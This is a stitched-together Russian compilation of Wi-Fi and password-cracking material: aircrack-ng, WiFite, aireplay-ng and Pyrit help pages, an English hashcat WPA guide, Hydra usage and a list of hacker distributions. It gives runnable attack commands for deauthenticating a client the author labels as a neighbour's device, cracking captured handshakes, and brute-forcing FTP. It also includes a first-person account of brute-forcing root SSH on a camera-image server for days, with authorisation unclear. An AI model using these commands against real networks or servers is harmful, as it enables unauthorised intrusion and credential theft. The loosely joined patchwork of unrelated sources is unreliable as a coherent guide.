Как пользоваться aircrack

Справка по WiFite

опциональные аргументы:
  -h, --help           показать справку и выйти

НАСТРОЙКИ:
  -i        Беспроводной интерфейс для использования (по умолчанию: спрашивать)
  -c          Беспроводные каналы для сканирования (по умолчанию: все каналы)
  -5, --5ghz           Включая 5Ghz каналы (по умолчанию: выключено)
  -b            BSSID (например, AA:BB:CC:DD:EE:FF) точки доступа для атаки
  -e            ESSID (имя) точки доступа для атаки
  -v, --verbose        Вербальный режим, печатать все строки (по умолчанию: тихий)

WEP:
  --wep                Показывать только сети с шифрованием WEP (по умолчанию: выключено)
  --require-fakeauth   Атака не удалась, если не удалась фальшивая аутентификация (по умолчанию: выключено)
  --pps           Пакетов в секунду для восроизведения (по умолчанию: 600 pps)
  --wept      Ожидать секунд перед неудачей (по умолчанию: 600 секунд)
  --wepca         Запустить взлом на этом количестве IVs (по умолчанию: 10000 ivs)
  --weprs     Перезапустить aireplay если не появляются новые IVs (по умолчанию: 11 секунд)
  --weprc     Перезапустить aircrack после этой задержки (по умолчанию: 30 секунд)
  --arpreplay          Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено)
  --fragment           Использовать атаку WEP фрагментации (по умолчанию: включено)
  --chopchop           Использовать WEP атаку чоп-чоп (по умолчанию: включено)
  --caffelatte         Использовать WEP атаку Кафе латте (по умолчанию: включено)
  --p0841              Использовать WEP атаку p0841 (по умолчанию: включено)
  --hirte              Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено)

WPA:
  --wpa                Показывать только сети с WPA шифрованием (включая WPS)
  --wpadt     Время ожидания перед отправкой деаутентификации (по умолчанию: 10 секунд)
  --wpat      Время ожидания, чтобыб признать атаку WPA неудачной (по умолчанию: 500 секунд)
  --hs-dir        Директория для сохранения рукопожатий files (по умолчанию: hs)
  --dict         Файл, содержащий пароли для взлома (по умолчанию: None)
  --strip              Очистить ненужные пакеты из захваченного рукопожатия используя tshark или pyrit

WPS:
  --wps                Показывать только сети с WPS
  --reaver             Использовать ТОЛЬКО Reaver на WPS сетях (по умолчанию: выключено)
  --no-reaver          НЕ использовать Reaver на WPS сетях (по умолчанию: выключено)
  --pixie              Использовать только атаку WPS Pixie-Dust (по умолчанию: выключено)
  --pixiet    Время ожидания перед признанием атаки PixieDust неудачной (по умолчанию: 300 секунд)
  --pixiest   Время ожидания для шага прогресса перед признанием атаки PixieDust неудачной (по умолчанию: 30 секунд)
  --wpst      Время ожидания перед признанием атаки WPS PIN неудачной (по умолчанию: 600 секунд)
  --wpsmr     Максимальное количество попыток перед признанием неудачи (по умолчанию: 20)
  --wpsmf       Максимальное число неудач Reaver перед признанием атаки провалившейся (по умолчанию: 30)
  --wpsmt    Максимальное количество таймаутов перед остановкой (по умолчанию: 30)
  --ignore-ratelimit   Игнорировать атаку, если WPS ограничен по скорости (по умолчанию: включено)

КОМАНДЫ:
  --cracked            Показать ранее взломанные точки доступа
  --check        Проверить .cap файлы (или все hs/*.cap файлы) на WPA рукопожатия

Набор программ в пакете Aircrack-ng

  • airbase-ng – Настраивает фальшивую точку доступа
  • aircrack-ng – Взломщик беспроводных паролей
  • airdecap-ng – Расшифровывает захваченные файлы WEP/WPA/WPA2
  • airdecloak-ng – Удаляет wep маскировку из файла pcap
  • airdriver-ng – Обеспечивает информацию о состоянии беспроводных драйверов в вашей системе. Удалена в 1.2 rc 1
  • airdrop-ng – эта программа используется для целенаправленной, основанной на правилах деаутентификации пользователей. Она может выбирать цель основываясь на MAC адресе, типе железа, (используя запросы OUI, IE, “APPLE” устройства) или полностью деаутентифицировать ВСЕХ пользователей. В передаче пакетов деаутентификации используются lorcon и pylorcon.
  • aireplay-ng – Главная функция — это генерация трафика для последующего использования в aircrack-ng
  • airgraph-ng – Утилита визуализации 802.11
  • airmon-ng – Этот скрипт может использоваться для включения режима монитора на беспроводных интерфейсах
  • airmon-zc – Скрипт использовался для включения режима монитора на беспроводных интерфейсах, в настоящее время переименован в airmon-ng
  • airodump-ng – Используется для захвата пакетов сырых 802.11 фреймов
  • airodump-ng-oui-update – Загружает и парсит список IEEE OUI
  • airoscript-ng –  Является полным пользовательским интерфейсом для взаимодействия с Aicrack-ng и позволяет с лёгкостью использовать сетевые атаки WEP и WPA. Он даёт вам почти полную функциональность Aircrack-ng, позволяя сохранить время на написание команды. Airoscript-ng также обеспечивает комплексный способ создания отчётов безопасности, которые способны понимать не специалисты, может записывать их (с помощью плагина wkhtml2pdf) в формат pdf.
  • airolib-ng – Создан для хранения и управления списками essid и паролей
  • airserv-ng – Сервер беспроводной карты
  • airtun-ng – Создатель интерфейса виртуального туннеля
  • besside-ng – Автоматически взламывает WEP и WPA сети
  • besside-ng-crawler – Фильтрует EAPOL фреймы из директории захваченных файлов
  • buddy-ng – Инструмент для работы с easside-ng
  • easside-ng – Инструмент с автоматической магией, который позволяет вам общаться через точку доступа с WEP-шифрованием
  • ivstools – Этот инструмент работает с файлами .ivs. Вы можете объединять или конвертировать их
  • kstats – Показывает статистические голоса FMS алгоритма для ivs дампа и конкретного WEP ключа
  • makeivs-ng – Генерирует векторы инициализации
  • packetforge-ng – Создаёт зашифрованные пакеты, которые могут быть впоследствии использованы для инъекции
  • tkiptun-ng – Этот инструмент способен делать инжект нескольких фреймов в WPA TKIP сеть с QoS
  • versuck-ng  – Генератор дефолтных wep ключей для роутеров Actiontec
  • wesside-ng – Инструмент с автоматической магией, который включает несколько техник для легкого получения WEP ключа
  • wpaclean – Удаляет избыточные данные из pcap файла

Справка по maskprocessor

Использование:

maskprocessor ... маска

или (в зависимости от способа установки):

./mp64.bin ... маска
* Запуск:

  -V,  --version             Напечатать версию
  -h,  --help                Напечатать помощь

* Приращение:

  -i,  --increment=ЧИСЛО:ЧИСЛО   Включить режим приращения. 
                                 Первое ЧИСЛО=начало, второе ЧИСЛО=конец
                                 Пример: -i 4:8 интересующая длинна 4-8 (включая)

* Разное:

       --combinations          Посчитать количество комбинаций
       --hex-charset           Предположить, что символы даны в шестнадцатеричном виде
  -q,  --seq-max=ЧИСЛО         Максимальное число одинаковых повторяющиеся символов
  -r,  --occurrence-max=ЧИСЛО  Максимальное число вхождения одного символа

* Ресурсы:

  -s,  --start-at=СЛОВО       Начать с конкретной позиции
  -l,  --stop-at=СЛОВО        Закончить на конкретной позиции

* Файлы:

  -o,  --output-file=ФАЙЛ     Файл вывода

* Пользовательские наборы символов:

  -1,  --custom-charset1=CS  Пользовательские наборы символов
  -2,  --custom-charset2=CS  Пример:
  -3,  --custom-charset3=CS  --custom-charset1=?dabcdef
  -4,  --custom-charset4=CS  устанавливает для ?1 символы 0123456789abcdef

* Встроенные наборы символов:

  ?l = abcdefghijklmnopqrstuvwxyz
  ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
  ?d = 0123456789
  ?s =  !"#$%&'()*+,-./:;?@^_`{|}~
  ?a = ?l?u?d?s
  ?b = 0x00 - 0xff

Руководство по aircrack-ng

Общие опции:

-a

Режим атаки брутфорсом, 1 или wep для WEP и 2 или wpa для WPA-PSK.

-e

Выбрать целевую сеть, основываясь на ESSID. Эта опция также требуется для взлома WPA если SSID скрыт.

-b или —bssid

Выбрать целевую сеть основываясь на MAC адресе.

-p

Установить количество используемых CPU (доступно только на SMP системах). По умолчанию, используются все доступные CPU.

-q

Если указан этот ключ, то информация о состоянии не отображается.

-C или —combine

Объединить эти MAC адреса ТД (разделённые запятой) в один виртуальный.

-l

Записать ключ в файл.

-E

Создать файл проекта Elcomsoft Wireless Security Auditor (EWSA) v3.02.

Опции статичного взлома WEP:

-c

Поиск только буквенно-цифровых символов.

-t

Поиск только бинарно-закодированных десятеричных символов.

-h

Поиск числа ключа для Fritz!BOX

-d или —debug

Указать маску ключа. Например: A1:XX:CF

-m

Сохранять только IV пришедшие из пакетов, которые соответствуют этому MAC адресу. Альтернативно, используйте -m ff:ff:ff:ff:ff:ff для использования всех и каждого IV, независимо от сети (это отключает фильтрацию ESSID и BSSID).

-n

Указать длину ключа: 64 или 40-бит WEP, 128 или 104-бит WEP, и т.д., до 512 бит длины. Значение по умолчанию это 128.

-i

Сохранять только IV, которые имеют ключевой индекс (от 1 до 4). Поведение по умолчанию — игнорировать ключевой индекс в пакетах и использовать IV независимо от него.

-f

По умолчанию этот параметр установлен в 2. Используйте более высокую величину для увеличения уровня брутфорса: взлом займёт больше времени, но с большей вероятностью на успех.

-k

Есть всего 17 атак KoreK. Иногда одна атака создаёт громадное ложное срабатывание, что не даёт найти ключ, даже с множеством IV. Попробуйте -k 1, -k 2, … -k 17 для последовательного исключения каждой атаки.

-x или -x0

Отключить брутфорс последних keybytes (не рекомендуется)

-x1

Включить брутфорсинг последнего keybyte (по умолчанию)

-x2

Включить брутфорсинг последних двух keybytes.

-X

Отключить многопоточный брутфорсинг (только SMP).

-s

Показать ASCII версию ключа в правой части экрана.

-y

Это экспериментальная атака единичного брутфорса, которую следуют использовать когда стандартный режим атаки терпит неудачу с более чем одним миллионом IV.

-z

Использовать PTW (Andrei Pyshkin, Erik Tews и Ralf-Philipp Weinmann) атаку (атака по умолчанию).

-P или —ptw-debug

Отладка PTW: 1 Отключить klein, 2 PTW.

-K

Использовать атаки KoreK вместо PTW.

-D или —wep-decloak

Использовать режим раскрытия WEP.

-1 или —oneshot

запустить только 1 попытку для взлома ключа с PTW

-M

Задать максимальное число IV которое использовать

Опции взлома WEP и WPA-PSK

-w

Путь до файла словаря для взлома wpa. Укажите «-» для стандартного ввода. Списки словарей: https://kali.tools/?p=1896

-N или —new-session

Создать новую сессию взлома. Она позволяет прерывать процесс взлома (брут-форс) пароля и затем вновь запускать с места остановки (используя -R или —restore-session). Файлы статуса сохраняются каждые 5 минут.

Она не перезаписывает существующий файл сессии.

-R или —restore-session

Восстановить и продолжить ранее сохранённую сессию взлома. Этот параметр должен использоваться один, другие параметры не должны быть указаны при запуске aircrack-ng (вся необходимая информация присутствует в файле сессии).

Опции взлома WPA-PSK:

-E

Создать файл проекта Elcomsoft Wireless Security Auditor (EWSA) v3.02.

-j

Создать файл захвата Hashcat v3.6+ (HCCAPX).

-J

Создать файл захвата Hashcat (HCCAP).

-S

тест скорости взлома WPA.

-Z

Продолжительность теста скорости взлома WPA в секундах.

-r

Путь до базы данных airolib-ng. Нельзя использовать с ‘-w’.

SIMD selection:

—simd=

Aircrack-ng автоматически загружает и использует самую быструю оптимизацию на основе инструкций, доступных для вашего CPU. Эта опция позволяет принудительно выбрать другую оптимизацию. Выборы зависят от вашего центрального процессора, в общей сложности доступны следущие варианты, которые могут быть скомпилированы независимо от типа CPU: generic, sse2, avx, avx2, avx512, neon, asimd, altivec, power8.

—simd-list

Показывает список доступных SIMD архитектур, разделённых символом пробела. Aircrack-ng автоматически выбирает самую быструю оптимизацию и поэтому эта опция нужна не часто. Случаями использования могут быть в целях тестирования, когда «более низкая» оптимизация, такая как «generic», является более быстрой, чем выбранная автоматически. Перед принудительным включением архитектуры SIMD, убедитесь, что инструкции поддерживаются вашим CPU, для этого используйте -u.

Другие опции:

-H или —help

Показать справку

-u или —cpu-detect

Обеспечивает информации о количестве CPU и поддержке MMX/SSE

Использование

Разбиваем на несколько частей, каждую рассматриваем отдельно.

airmon-ng

Самый маленький и основопологающий пакет, его проще всего использовать. Он переводит беспроводную карточку в режим мониторинга и контролирует созданный им виртуальный интерфейс.
С этого момента и далее мы будем использовать работать от имени суперпользователя и моя личная просьба, не копируйте, а набирайте ручками с пониманием.

Sudo su #Получаем права root

Теперь нам понадобиться узнать системное имя нашей карточки

Iwconfig

Смотрим вывод, в моём случае это wlan0, сделаю акцент, что не у всех оно будет обязательно wlan0.

Airmon-ng

Разбираемся, airmon-ng имя покета, содержимое в пояснении не нуждается, это управление интерфейсом. системное имя адаптера, канал или частота на которой будет постоянно
работать виртуальный адаптер.

Airmon-ng start wlan0 1

airmon-ng «запустить» интерфейс wlan0 с каналом 1.
нас интересует вывод, внизу вывода после надписи «wlan0 Atheros ath9k — » будет строка »(monitor mode enabled on mon0)» она нас и интересует, mon0 это имя интерфейса с которым мы будем работать далее.
Для того чтобы остановить виртуальный интерфейсы, нужно или перезагрузить машину или вбить:

Airmon-ng stop mon0

Где mon0 это название виртуального интерфейса.

airodump-ng

Нужна для отлавливания пакетов со всех каналов или одного канала, привыкайте к тому, что вай фай карточка работает, не с сетью, а с каналом.
Если мы хотим дальше использовать aircrack-ng то нужно запускать airodump-ng с ключами для вывода файлов.

Mkdir snif
airodump-ng -w «~/snif/» mon0
или
airodump-ng -w ~/snif/ mon0

где -w ключ для вывода, а дальше путь куда будут сохраняться файлы прослушивания.
ещё есть ключ –channel после которого пишется номер нужного канала, использовать только при надобности, например если aireplay-ng не хочет корректно работать из-за того что не может переключится на нужный канал.
Практика, запускаем монитор, с ключём на конце, например с названием сети на которую я охочусь (для упорядочивания прослушанных файлов)
Подразумевается что Inri моя сеть и словарь который я использую для перебора содержит взарание известный мне пароль, в реальных условиях подобирать пароль очень долго и успешность зависит от словаря и сложности пароля.

Airodump-ng -w «/home/timofey/snif/Inri» mon0

Разбираем окно:
CH канал который сейчас слушает монитор, Elapsed Время работы.
BSSID MAC адресс роутера, PWR мощьность сигнала, чем выше значение тем лучше, -50 > -80. Beacons количество «объявлений» о существовании, чем выше, тем активнее точка. Data количество пакетов. s — скорость передачи пакетов, MB скорость. ENC — тип ключа, в данном случае WPA. ESSID — имя сети, отображаемое.
Ниже STATION клиенты сетей с BSSID находящимися напротив.

74:DE:2B:77:19:4D — я
18:F4:6A:9B:BF:59 — соседка.
C8:64:C7:53:02:0C — нужная нам точка доступа.

Собственно всё что нас интересует.

aireplay-ng

Пакет для хуков, в данном случае он нам понадобится для получения среди пакетов ключей ауентификации.

Создаём новое окно терминала, получаем права суперпользователя и вбиваем

Aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c 18:F4:6A:9B:BF:59 mon0

где -0 режим атаки — деаунтефикация.
-а атакуемая точка.
-с клиент который потеряет сеть.
1000 количество попыток (с какой то попытки человек вылетит из сети насовсем и 100% передаст заново ключи ауентификации)
На практике доказано, что хватает 20-30 пакетов чтобы выбить человека из сети, а 1000 садизм.
Видим в мониторе как у клиента растут переданные пакеты, отлично теперь переходим к заключительной части.
Для всяких извращений курим help

Aireplay-ng —help

aircrack-ng

Теперь заключительная часть, у нас куча данных переданных по сети, огромное количество пакетов (чем больше, тем больше шансов выловить что-то полезное).

Aircrack-ng -a 2 -e «by Inri» -w «/home/timofey/words/my1.txt» «/home/timofey/snif/Inri-02.cap»

Где -a тип ключа 1|WEP 2|WPA/WPA2
-e название сети
-w путь к файлу с словарём *читал что можно написать *** для того чтобы использовать все доступные словари и прослушанные данные, но не выходит, пишет ошибку.
А последнее путь к файлу с прослушанными пакетами.
Вывод, с 4 попытки подобрал (повторяюсь ключ был известен и вписан в словарь для скорости и 100% вероятности перебора).

Aircrack-ng 1.1
4 keys tested (415.33 k/s)
KEY FOUND!
Master Key: CE 25 4A B0 41 BE 0F 4F E4 01 68 AB 07 69 B2 71
11 20 52 86 63 BA 4E 17 97 B4 8E 84 69 68 34 0D
Transient Key: 58 40 8D E3 D7 8E A8 DA 89 BC 44 39 37 02 D1 C4
16 99 AC C3 93 3E DF 52 AC C4 3E C5 DF C3 CD DF
7B 6F C8 3E E8 B0 F8 AA 16 C1 0C 69 2F 94 47 3A
1B 90 EF 22 59 60 34 B2 96 11 A5 FB 5B F7 21 F2
EAPOL HMAC: DA C6 09 55 6D E8 0E D0 97 25 96 F6 F7 53 D7 7F

Комментарии к записи Aircrack-ng (программа)
отключены

Preparation

hashcat is very flexible, so I’ll cover three most common and basic scenarios:

  1. Dictionary attack

  2. Brute-Force attack

  3. Rule-based attack

Dictionary attack

  • Put it into the hashcat folder.
  • Rename your converted capture file “capture.hccapx”.
  • On Windows, create a batch file “attack.bat”, open it with a text editor, and paste the following:
hashcat.exe -m 2500 capture.hccapx rockyou.txt
pause

Execute the attack using the batch file, which should be changed to suit your needs.

Brute-Force Attack

  • Rename your converted capture file “capture.hccapx”.
  • Create a batch file “attack.bat”, open it with a text editor, and paste the following:
hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d
pause

This will pipe digits-only strings of length 8 to hashcat. Replace the ?d as needed.

It would be wise to first estimate the time it would take to process using a calculator.

TBD: add some example timeframes for common masks / common speed

Rule-based attack

This is similar to a Dictionary attack, but the commands look a bit different:

hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt
pause

This will mutate the RockYou wordlist with best 64 rules, which come with the hashcat distribution.

Change as necessary and remember, the time it will take the attack to finish will increase proportionally with the amount of rules.

11. Брут-форс SSH и FTP

На сервере были найдены два пользователя с правами администратора, root и ещё один, имя которого привести не могу.

Анализ исходного кода веб-интерфейсов для просмотра сохранённых с камер фотографий дал ещё один пароль — тоже из шести цифр

Я обратил внимание, что владельцем папок веб-сервера, где расположены фотографии, является не Apache (не www-data), а разные пользователи. Оказалось, что для них предусмотрены учётные данные FTP, а также для под ними можно входить по SSH, причём в обоих случаях подходит пароль администратора, который подходит и для root MySQL, и для сервиса на сайте

К сожалению, у этих пользователей нет прав на выполнение команд с sudo. То есть у меня и так уже есть доступ к тому, к чему у них есть доступ (разве что, под этими пользователями можно редактировать файлы сайтов).

Но, что самое печальное, что этот самый пароль администратора не подходит к пользователю системы Linux, также не подходит к учётной записи root. Если честно, я сначала даже удивился — ко всему подходит, а к этому не подходит… Видимо, пароли для этих пользователей придумывали на аутсорсе…

Будем исходить из того, что пароль всё-таки из шести цифр. Тогда сгенерируем его с помощью maskprocessor:

maskprocessor ?d?d?d?d?d?d > dig.pass

Для брутфорса я предпочитаю patator.

Я хотел запустить подбор пароля прямо с самого сервера. Python там оказался установленным, но не оказалось paramiko, поэтому я получил ошибку:

ERROR: paramiko 1.7.7.1 (http://www.paramiko.org/) is required to run ssh_login.

В результате запустил брут-форс по старинке:

patator ssh_login host=IP user=root password=FILE0 0=dig.pass -x ignore:mesg='Authentication failed.'

У меня уже не было цели во что бы то ни стало добыть пароль — уже доказано, что сервер небезопасен. Поэтому я не брутфорсил 24/7, запускал иногда перебор, когда вспоминал про это. Дней через 10 вдруг перебор застопорился:

ssh: connect to host IP port 22: Connection refused

Я сначала подумал, что забанили IP, откуда присылались запросы. Но это не подвердилось.

Как оказалось, на сервер был выполнен вход под учётной записью root и был изменён файл /etc/ssh/sshd_config. Не знаю, это связано с моей деятельностью или просто админ решил «докрутить безопасность». Я заглянул в файл настроек SSH:

cat /etc/ssh/sshd_config

Главное, в чём была докрутка, это вот такая директива:

Port 40022

То есть вместо порта 22 теперь SSH сервер работает на порте 40022 — видимо, чтобы никто не догадался.

Для решения этой проблемы в patator нужно указать нестандартный порт:

patator ssh_login host=IP port=40022 user=root password=FILE0 0=dig.pass -x ignore:mesg='Authentication failed.'

Если перебор не доведён до конца, то при завершении работы patator выведет что-то вроде:

08:56:40 patator INFO - To resume execution, pass --resume 3591,3577,3564,3592,3572,3588,3588,3568,3584,3588

Если вы хотите продолжить с того места, где была сделана остановка, то при последующем запуске patator добавьте эту строку к команде, получится примерно так:

patator ssh_login host=IP port=40022 user=root password=FILE0 0=dig.pass -x ignore:mesg='Authentication failed.' --resume 3591,3577,3564,3592,3572,3588,3588,3568,3584,3588

Удачный подбор пароля от Linux пользователя root или от пользователя, у которого есть права на выполнение команд с sudo, означает самую полную компрометацию сервера — полный взлом. Взломать сильнее уже невозможно — становятся доступными любые настройки, любые файлы, любые действия на сервере.

Справка по Aireplay-ng

использование:

aireplay-ng  

Опции фильтра:

      -b bssid  : MAC адрес, Точка Доступа
      -d dmac   : MAC адрес, Место назначения
      -s smac   : MAC адрес, Источник
      -m len    : минимальная длинна пакета
      -n len    : максимальная длинна пакета
      -u type   : управление фреймом, тип    поле
      -v subt   : управление фреймом, подтип поле
      -t tods   : управление фреймом, От      DS bit
      -f fromds : управление фреймом, К    DS bit
      -w iswep  : управление фреймом, WEP     бит
      -D        : отключить выявление ТД

Опции повторного воспроизведения (инъекции):

      -x nbpps  : количество пакетов в секунду
      -p fctrl  : установить контроллер фреймов слово (шестнадцатиричное)
      -a bssid  : установить MAC address
      -c dmac   : установить Пункт назначения  MAC адрес
      -h smac   : установить Источник          MAC адрес
      -g value  : изменить размер кольцевого буфера (по умолчанию: 8)
      -F        : выбрать первый совпадающий пакет

Опции атаки Фальшивая деаутентификация:

      -e essid  : установить SSID целевой ТД
      -o npckts : количество пакетов за одну вспышку (0=автоматически, по умолчанию: 1)
      -q sec    : секунды между временем жизни
      -Q        : отправлять запросы о повторном переподключении
      -y prga   : поток ключей для общего ключа аутентификации
      -T n      : выйти после повторных попыток запросов фальшивой аутентификации n раз

Опции атаки повторной отправки запросов ARP:

      -j        : инжект Из  DS пакетов

Опции фрагментированной атаки:

      -k IP     : установить IP пункта назначения во фрагментах
      -l IP     : установить IP источника во фрагментах

Опции тестирования инжекта:

      -B        : активировать тест битрейта

Опции источника:

      -i iface  : захватывать пакеты с этого интерфейса
      -r файл   : извлечь пакеты из этого pcap файла

Прочие опции:

      -R                    : отключить использование /dev/rtc 
      --ignore-negative-one : если интерфейс канала не может быть 
                              определён, игнорировать несоответствие, 
                              нужно для непропатченного cfg80211

Режимы атаки (также можно использовать цифры):

      --deauth      число : деаунтифицировать 1 или все станции (-0)
                            Подробности: Деаутентификация клиентов 
                            беспроводной сети в Kali Linux - 
                            http://hackware.ru/?p=74
      --fakeauth    задержка : фальшивая аутентификация с ТД (-1)
      --interactive       : интерактивный выбор фреймов (-2)
      --arpreplay         : стандартная повторная отправка запросов ARP (-3)
      --chopchop          : расшифровать/порубить WEP пакет (-4)
      --fragment          : сгенерировать валидный поток ключей   (-5)
      --caffe-latte       : запросить клиента на новые IVs  (-6)
      --cfrag             : фрагментирование в отношении клиента  (-7)
      --migmode           : атаки режим миграции WPA  (-8)
      --test              : тест возможности инжекта и качества соединения (-9). 
                            Подробности: Как узнать, поддерживает ли 
                            беспроводная карта инжект (инъекцию) -
                            http://hackware.ru/?p=67
      --help              : Показать справку

Описание WiFite

Инструмент автоматизированной беспроводной атаки.

Wifite работает только на Linux.

Wifite был создан для использования с дистрибутивами на тестирование на проникновение, такими как Kali Linux, Pentoo, BackBox; любыми дистрибутивами Linux с пропатченным для инжекта беспроводными драйверами. По видимому, также работает на Ubuntu, Debian и Fedora.

Wifite должна быть запущена от рута. Это требуется набором программ, который она использует. Запуск загруженных скриптов от рута — это плохая идея. Я рекомендую использовать загрузочный Kali Linux Live CD, загрузочную флешку USB (для тестирования на проникновение) или виртуальную машину. Помните, что виртуальные машины не могут напрямую иметь доступ к железу, поэтому требуется беспроводной USB адаптер.

Wifite предполагает, что у вас есть беспроводная карта и подходящие драйверы, пропатченные для инжекта и неразборчивого режима/режима наблюдения.

Инструмент может атаковать множество зашифрованных сетей WEP, WPA и WPS подряд. Этот инструмент настраивается до автоматизма всего лишь несколькими аргументами. Цель Wifite — быть инструментом беспроводного аудита по принципу «установил и забыл».

Особенности:

  • сортирует цели по сигналу (в dB); первыми взламывает самые близкие точки доступа
  • автоматически деаутентифицирует клиентов скрытых сетей для раскрытия их SSID
  • набор фильтров для точного указания, что именно атаковать (wep/wpa/обе, выше определённой силы сигнала, каналы и т.д.)
  • гибкие настройки (таймауты, пакеты в секунду, другое)
  • функции «анонимности»: смена MAC на случайный адрес перед атакой, затем обратная смена, когда атака завершена
  • все захваченные рукопожатия WPA копируются в текущую директорию wifite.py
  • умная деаутентификация WPA; циклы между деаутентификацией всех клиентов и широковещательной
  • остановка любого взлома по Ctrl+C с опциями для продолжения, переход к следующей цели, пропуск взлома или выход
  • отображение общей информации по сессии при выходе; показ всех взломанных ключей
  • все пароли сохраняются в cracked.txt

Лицензия: GPLv2

Список лучших дистрибутивов для хакеров

Kali Linux — скачать.

Kali Linux существует уже очень давно, и он действительно является лидером в области тестирования на проникновение и обучения информационной безопасности. С его помощью можно выявить недостатки безопасности, использовать различные эксплойты и много экспериментировать. Также данный дистрибутив не очень сложен в освоении и определенно заслуживает внимания.

У нас на сайте есть статьи про Kali Linux и различные инструменты для взлома и выявления уязвимостей, которые вы всегда можете почитать.

Parrot Security OS — скачать.

Parrot Security – это дистрибутив на основе Debian. Он включает в себя множество инструментов для разработки программного обеспечения, защиты конфиденциальности и тестирования безопасности. Если вы очень увлечены тестированием безопасности и взломом, данный дистрибутив действительно может понравится. Из плюсов можно выделить следующее:

  1. Поддержка сообщества.
  2. Большое количество профессиональных инструментов.
  3. Стабильность работы ОС.

BackBox — скачать.

Подход BackBox состоит в том, чтобы предложить бесплатную среду с открытым исходным кодом, в которой можно проводить тестирование безопасности без каких-либо ограничений. Также данная ОС хорошо подходит для симулирования сетевых атак. Сообщество не так велико, но не менее активно, по этому данный дистрибутив также можно использовать для взлома и тестирования на проникновения.

Samurai Web Testing Framework — скачать.

Возможно, самое лучшее в среде веб-тестирования Samurai — это виртуальная машина. Сам по себе дистрибутив не является полноценной ОС, но в нем есть все инструменты, необходимые для качественного пентестинга. Самое приятное в этом то, что он уже настроен как среда для тестирования веб-приложений. Он также имеет одни из лучших инструментов для тестирования на проникновение и взлома. В общем, это отличный вариант, если вы настроены на поиск уязвимостей в сети.

Pentoo Linux — скачать.

Pentoo Linux — это в значительной степени обычный дистрибутив Linux, но он сосредоточен на безопасности. Самым сложным и отличным одновременно является установка Pentoo. Она может занимать много времени, но дает большие возможности кастомизации прямо из коробки. Например, вы можете установить дистрибутив на собственном ядре или поставить полностью пользовательский набор инструментов. Всё потому что данный дистрибутив появился от Gentoo.

Pentoo Linux является отличным выбором для тестирования безопасности и взлома, но требует больше времени и усилий на его освоение.

DEFT Linux — скачать.

DEFT — это короткое название для набора цифровых доказательств и набор инструментов для криминалистики(digital evidence and forensics toolkit). Он отлично подходит для тестирования на проникновение и взлома, и конечно же DEFT является бесплатным. Дистрибутив подойдет для ИТ-аудиторов, университетов, военных и так далее

Адаптируемость и простота использования, предлагаемые здесь на высшем уровне, что показывает отличное внимание к деталям со стороны разработчиков

Caine — скачать.

Caine, как и другие дистрибутивы в данном списке, сосредоточен на безопасности. У него очень удобный интерфейс, который значительно лучше, чем у других систем. Инструменты для взлома и пентестинга, которые идут в наборе с системой крайне надежны и имеют большой функционал.

Network Security Toolkit (NST) — Скачать.

The Network Security Toolkit основан на Fedora. Как следует из названия, ОС является Live-образом. Каждый специалист по безопасности и сетевой администратор может использовать его вместе с очень хорошим набором инструментов для проверки сетевой безопасности. Тот факт, что он работает с USB или DVD, приносит немало преимуществ, но также есть и очевидные недостатки, которые присущи данному классу операционных систем.

BlackArch — скачать.

Если вам нужен отличный дистрибутив Linux, ориентированный исключительно на пентестинге, лучше чем BlackArch найти не получится. ОС включает в себя более чем 2000 инструментов для взлома и проверки безопасности. Кроме того, он имеет возможность очень гибкой настройки, что не может не радовать.

Bugtraq – скачать.

Bugtraq поставляется с отличным набором инструментов для тестирования на проникновение и взлома, и самое приятное в этом то, что он постоянно развивается. Каждый инструмент, который входит в комплект ОС, был тщательно протестирован. Дистрибутив действительно стабилен и приятен в использовании.

Hydra

Hydra — это взломщик, который поддерживает множество протоколов: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Чтобы запустить, перейдите в Applications → Password Attacks → Online Attacks → hydra.

Откроется консоль терминала, как показано на следующем снимке экрана.

Сейчас мы будем подбирать пароль для FTP на хосте с IP адресом 192.168.1.101

У нас есть список паролей в файле password.lst и файл с логинами в файле user.lst по пути \usr\share\wordlist\metasploit

Команда будет выглядеть следующим образом

# hydra -l /usr/share/wordlists/metasploit/user.lst -P /usr/share/wordlists/metasploit/passwords.lst ftp://192.168.1.101 –V

где –V — это выводить имя пользователя и пароль при попытке подбора (verbose)

Как показано на следующем скриншоте, имя пользователя и пароль найдены — это msfadmin:msfadmin

Если хотите, можно запустить «гидру» в GUI (графическая оболочка). Для этого выберите в меню xhydra-gtk или выполните команду

Справка по Pyrit

Использование:

pyrit  комманда
Распознаваемые опции:
  -b               : Фильтрует Точки Доступа по BSSID
  -e               : Фильтрует Точки Доступа по ESSID
  -h               : Печатает помощь по конкретной команде
  -i               : Имя файла для ввода ('-' это стандартный ввод)
  -o               : Имя файла для вывода ('-' это стандартный вывод)
  -r               : Источник захвата пакетов в формате pcap
  -u               : URL системы хранения для использования
  --all-handshakes : Использовать все рукопожатия вместо самого лучшего

Распознаваемые команды:
  analyze                 : Анализировать файл с захваченными пакетами
  attack_batch            : Атаковать рукопожатие PMKs/паролями из БД
  attack_cowpatty         : Атаковать рукопожатие PMKs из файла cowpatty
  attack_db               : Атаковать рукопожатие PMKs из БД
  attack_passthrough      : Атаковать рукопожатие паролями из файла
  batch                   : Пакетная обработка базы данных
  benchmark               : Определить производительность доступных ядер
  benchmark_long          : Более длительная и более аккуратная версия бенчмарка (~10 минут)
  check_db                : Проверить базу данных на ошибки
  create_essid            : Создать новую ESSID
  delete_essid            : Удалить ESSID из базы данных
  eval                    : Подсчитать доступные пароли и соответствующие результаты
  export_cowpatty         : Экспортировать результаты в новый файл cowpatty 
  export_hashdb           : Экспортировать результаты в базу данных airolib 
  export_passwords        : Экспортировать пароли в файл
  help                    : Вывести общую справку
  import_passwords        : Импортировать пароли из файлоподобного источника
